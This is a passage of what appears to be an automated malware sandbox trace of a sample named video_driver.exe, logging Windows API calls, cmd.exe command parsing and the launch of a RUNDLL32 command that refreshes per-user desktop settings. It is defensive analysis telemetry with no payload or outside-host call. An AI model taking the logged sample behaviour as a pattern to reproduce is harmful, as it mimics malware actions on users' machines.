(in: Locale=0x409, LCType=0x33, lpLCData=0x4a8d4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0040.032] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a8d4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0040.032] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a8d4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0040.032] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a8d4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0040.032] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a8d4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0040.033] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a8d4930, cchData=8 | out: lpLCData=".") returned 2 [0040.033] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a8d4920, cchData=8 | out: lpLCData=",") returned 2 [0040.033] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0040.034] GetProcessHeap () returned 0x4d0000 [0040.034] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20c) returned 0x4e2eb8 [0040.034] GetConsoleTitleW (in: lpConsoleTitle=0x4e2eb8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0040.036] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0040.036] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0040.036] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0040.036] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0040.036] GetProcessHeap () returned 0x4d0000 [0040.037] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x400a) returned 0x4e6ab8 [0040.037] GetProcessHeap () returned 0x4d0000 [0040.037] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e6ab8 | out: hHeap=0x4d0000) returned 1 [0040.038] _wcsicmp (_String1="RUNDLL32.EXE", _String2=")") returned 73 [0040.038] _wcsicmp (_String1="FOR", _String2="RUNDLL32.EXE") returned -12 [0040.038] _wcsicmp (_String1="FOR/?", _String2="RUNDLL32.EXE") returned -12 [0040.038] _wcsicmp (_String1="IF", _String2="RUNDLL32.EXE") returned -9 [0040.038] _wcsicmp (_String1="IF/?", _String2="RUNDLL32.EXE") returned -9 [0040.038] _wcsicmp (_String1="REM", _String2="RUNDLL32.EXE") returned -16 [0040.038] _wcsicmp (_String1="REM/?", _String2="RUNDLL32.EXE") returned -16 [0040.038] GetProcessHeap () returned 0x4d0000 [0040.038] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x58) returned 0x4e30d0 [0040.038] GetProcessHeap () returned 0x4d0000 [0040.038] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x22) returned 0x4e17d8 [0040.040] GetProcessHeap () returned 0x4d0000 [0040.040] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x6c) returned 0x4e3130 [0040.041] GetConsoleTitleW (in: lpConsoleTitle=0x2cf3e8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0040.042] GetFileAttributesW (lpFileName="RUNDLL32.EXE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rundll32.exe")) returned 0xffffffff [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="DIR") returned 14 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="ERASE") returned 13 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="DEL") returned 14 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="TYPE") returned -2 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="COPY") returned 15 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="CD") returned 15 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="CHDIR") returned 15 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="RENAME") returned 16 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="REN") returned 16 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="ECHO") returned 13 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="SET") returned -1 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="PAUSE") returned 2 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="DATE") returned 14 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="TIME") returned -2 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="PROMPT") returned 2 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="MD") returned 5 [0040.042] _wcsicmp (_String1="RUNDLL32", _String2="MKDIR") returned 5 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="RD") returned 17 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="RMDIR") returned 8 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="PATH") returned 2 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="GOTO") returned 11 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="SHIFT") returned -1 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="CLS") returned 15 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="CALL") returned 15 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="VERIFY") returned -4 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="VER") returned -4 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="VOL") returned -4 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="EXIT") returned 13 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="SETLOCAL") returned -1 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="ENDLOCAL") returned 13 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="TITLE") returned -2 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="START") returned -1 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="DPATH") returned 14 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="KEYS") returned 7 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="MOVE") returned 5 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="PUSHD") returned 2 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="POPD") returned 2 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="ASSOC") returned 17 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="FTYPE") returned 12 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="BREAK") returned 16 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="COLOR") returned 15 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="MKLINK") returned 5 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="DIR") returned 14 [0040.043] _wcsicmp (_String1="RUNDLL32", _String2="ERASE") returned 13 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="DEL") returned 14 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="TYPE") returned -2 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="COPY") returned 15 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="CD") returned 15 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="CHDIR") returned 15 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="RENAME") returned 16 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="REN") returned 16 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="ECHO") returned 13 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="SET") returned -1 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="PAUSE") returned 2 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="DATE") returned 14 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="TIME") returned -2 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="PROMPT") returned 2 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="MD") returned 5 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="MKDIR") returned 5 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="RD") returned 17 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="RMDIR") returned 8 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="PATH") returned 2 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="GOTO") returned 11 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="SHIFT") returned -1 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="CLS") returned 15 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="CALL") returned 15 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="VERIFY") returned -4 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="VER") returned -4 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="VOL") returned -4 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="EXIT") returned 13 [0040.044] _wcsicmp (_String1="RUNDLL32", _String2="SETLOCAL") returned -1 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="ENDLOCAL") returned 13 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="TITLE") returned -2 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="START") returned -1 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="DPATH") returned 14 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="KEYS") returned 7 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="MOVE") returned 5 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="PUSHD") returned 2 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="POPD") returned 2 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="ASSOC") returned 17 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="FTYPE") returned 12 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="BREAK") returned 16 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="COLOR") returned 15 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="MKLINK") returned 5 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="FOR") returned 12 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="IF") returned 9 [0040.045] _wcsicmp (_String1="RUNDLL32", _String2="REM") returned 16 [0040.046] GetProcessHeap () returned 0x4d0000 [0040.046] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x210) returned 0x4e31a8 [0040.046] GetProcessHeap () returned 0x4d0000 [0040.046] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x86) returned 0x4e33c0 [0040.046] _wcsnicmp (_String1="RUND", _String2="cmd ", _MaxCount=0x4) returned 15 [0040.046] GetProcessHeap () returned 0x4d0000 [0040.046] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x418) returned 0x4d07f0 [0040.047] SetErrorMode (uMode=0x0) returned 0x0 [0040.047] SetErrorMode (uMode=0x1) returned 0x0 [0040.047] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d07f8, lpFilePart=0x2cef08 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cef08*="Desktop") returned 0x25 [0040.047] SetErrorMode (uMode=0x0) returned 0x1 [0040.047] GetProcessHeap () returned 0x4d0000 [0040.047] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4d07f0, Size=0x6e) returned 0x4d07f0 [0040.047] GetProcessHeap () returned 0x4d0000 [0040.047] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4d07f0) returned 0x6e [0040.047] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8e0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0040.047] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0040.047] GetProcessHeap () returned 0x4d0000 [0040.047] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x120) returned 0x4e3450 [0040.047] GetProcessHeap () returned 0x4d0000 [0040.047] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x238) returned 0x4d0868 [0040.055] GetProcessHeap () returned 0x4d0000 [0040.055] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4d0868, Size=0x122) returned 0x4d0868 [0040.055] GetProcessHeap () returned 0x4d0000 [0040.055] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4d0868) returned 0x122 [0040.055] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8e0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0040.055] GetProcessHeap () returned 0x4d0000 [0040.055] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xe0) returned 0x4e3578 [0040.055] GetProcessHeap () returned 0x4d0000 [0040.055] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4e3578, Size=0x76) returned 0x4e3578 [0040.055] GetProcessHeap () returned 0x4d0000 [0040.055] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4e3578) returned 0x76 [0040.056] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.057] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceca4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceca4) returned 0xffffffff [0040.057] GetLastError () returned 0x2 [0040.057] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE.*", fInfoLevelId=0x1, lpFindFileData=0x2cec84, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec84) returned 0xffffffff [0040.057] GetLastError () returned 0x2 [0040.057] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cec84, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec84) returned 0xffffffff [0040.057] GetLastError () returned 0x2 [0040.057] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0040.057] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceca4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceca4) returned 0x4e35f8 [0040.058] GetProcessHeap () returned 0x4d0000 [0040.058] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x14) returned 0x4e3638 [0040.058] FindClose (in: hFindFile=0x4e35f8 | out: hFindFile=0x4e35f8) returned 1 [0040.058] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0040.058] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0040.058] GetConsoleTitleW (in: lpConsoleTitle=0x2cf17c, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0040.058] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf004, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf0cc | out: lpAttributeList=0x2cf004, lpSize=0x2cf0cc) returned 1 [0040.058] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf004, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf0c4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf004, lpPreviousValue=0x0) returned 1 [0040.058] GetStartupInfoW (in: lpStartupInfo=0x2cefc0 | out: lpStartupInfo=0x2cefc0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x13, lpReserved2=0x4d1a0c, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0040.058] GetProcessHeap () returned 0x4d0000 [0040.058] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x18) returned 0x4e3658 [0040.058] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0040.058] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0040.058] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0040.059] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0040.060] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0040.060] GetProcessHeap () returned 0x4d0000 [0040.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e3658 | out: hHeap=0x4d0000) returned 1 [0040.060] GetProcessHeap () returned 0x4d0000 [0040.060] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa) returned 0x4dff98 [0040.060] lstrcmpW (lpString1="\\rundll32.exe", lpString2="\\XCOPY.EXE") returned -1 [0040.062] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\rundll32.exe", lpCommandLine="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2cf060*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf0ac | out: lpCommandLine="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", lpProcessInformation=0x2cf0ac*(hProcess=0x78, hThread=0x74, dwProcessId=0x114, dwThreadId=0x7c0)) returned 1 [0040.072] CloseHandle (hObject=0x74) returned 1 [0040.072] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0040.072] GetProcessHeap () returned 0x4d0000 [0040.072] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e5f78 | out: hHeap=0x4d0000) returned 1 [0040.072] GetEnvironmentStringsW () returned 0x4e5f78* [0040.072] GetProcessHeap () returned 0x4d0000 [0040.072] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb36) returned 0x4e4158 [0040.073] FreeEnvironmentStringsW (penv=0x4e5f78) returned 1 [0040.073] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0041.270] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2cefa0 | out: lpExitCode=0x2cefa0*=0x0) returned 1 [0041.270] CloseHandle (hObject=0x78) returned 1 [0041.270] _vsnwprintf (in: _Buffer=0x2cf0e8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cefac | out: _Buffer="00000000") returned 8 [0041.270] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0041.270] GetProcessHeap () returned 0x4d0000 [0041.270] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e4158 | out: hHeap=0x4d0000) returned 1 [0041.270] GetEnvironmentStringsW () returned 0x4e4158* [0041.270] GetProcessHeap () returned 0x4d0000 [0041.270] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb5c) returned 0x4e9620 [0041.270] FreeEnvironmentStringsW (penv=0x4e4158) returned 1 [0041.270] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0041.270] GetProcessHeap () returned 0x4d0000 [0041.270] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e9620 | out: hHeap=0x4d0000) returned 1 [0041.270] GetEnvironmentStringsW () returned 0x4e4158* [0041.271] GetProcessHeap () returned 0x4d0000 [0041.271] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb5c) returned 0x4e9620 [0041.271] FreeEnvironmentStringsW (penv=0x4e4158) returned 1 [0041.271] GetProcessHeap () returned 0x4d0000 [0041.271] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4dff98 | out: hHeap=0x4d0000) returned 1 [0041.271] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf004 | out: lpAttributeList=0x2cf004) [0041.271] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.271] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0041.271] _get_osfhandle (_FileHandle=1) returned 0x7 [0041.271] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8d41ac | out: lpMode=0x4a8d41ac) returned 1 [0041.271] _get_osfhandle (_FileHandle=0) returned 0x3 [0041.271] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8d41b0 | out: lpMode=0x4a8d41b0) returned 1 [0041.272] SetConsoleInputExeNameW () returned 0x1 [0041.272] GetConsoleOutputCP () returned 0x1b5 [0041.272] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8d4260 | out: lpCPInfo=0x4a8d4260) returned 1 [0041.272] SetThreadUILanguage (LangId=0x0) returned 0x409 [0041.272] exit (_Code=0) Process: id = "10" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x49822000" os_pid = "0x114" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x564" cmd_line = "RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 10 os_tid = 0x7c0 Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x48da8000" os_pid = "0x5d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 11 os_tid = 0x138 [0041.415] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32f794 | out: lpSystemTimeAsFileTime=0x32f794*(dwLowDateTime=0xfefecb40, dwHighDateTime=0x1d623ff)) [0041.415] GetCurrentProcessId () returned 0x5d4 [0041.415] GetCurrentThreadId () returned 0x138 [0041.415] GetTickCount () returned 0x1145699 [0041.415] QueryPerformanceCounter (in: lpPerformanceCount=0x32f78c | out: lpPerformanceCount=0x32f78c*=16154827506) returned 1 [0041.417] GetModuleHandleA (lpModuleName=0x0) returned 0x49dd0000 [0041.417] __set_app_type (_Type=0x1) [0041.417] __p__fmode () returned 0x770331f4 [0041.417] __p__commode () returned 0x770331fc [0041.418] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49df21a6) returned 0x0 [0041.418] __getmainargs (in: _Argc=0x49df4238, _Argv=0x49df4240, _Env=0x49df423c, _DoWildCard=0, _StartInfo=0x49df4140 | out: _Argc=0x49df4238, _Argv=0x49df4240, _Env=0x49df423c) returned 0 [0041.418] GetCurrentThreadId () returned 0x138 [0041.418] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x138) returned 0x60 [0041.418] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0041.418] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0041.418] SetThreadUILanguage (LangId=0x0) returned 0x409 [0041.419] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0041.419] RegOpenKeyExW (in: hKey=0x80000001, 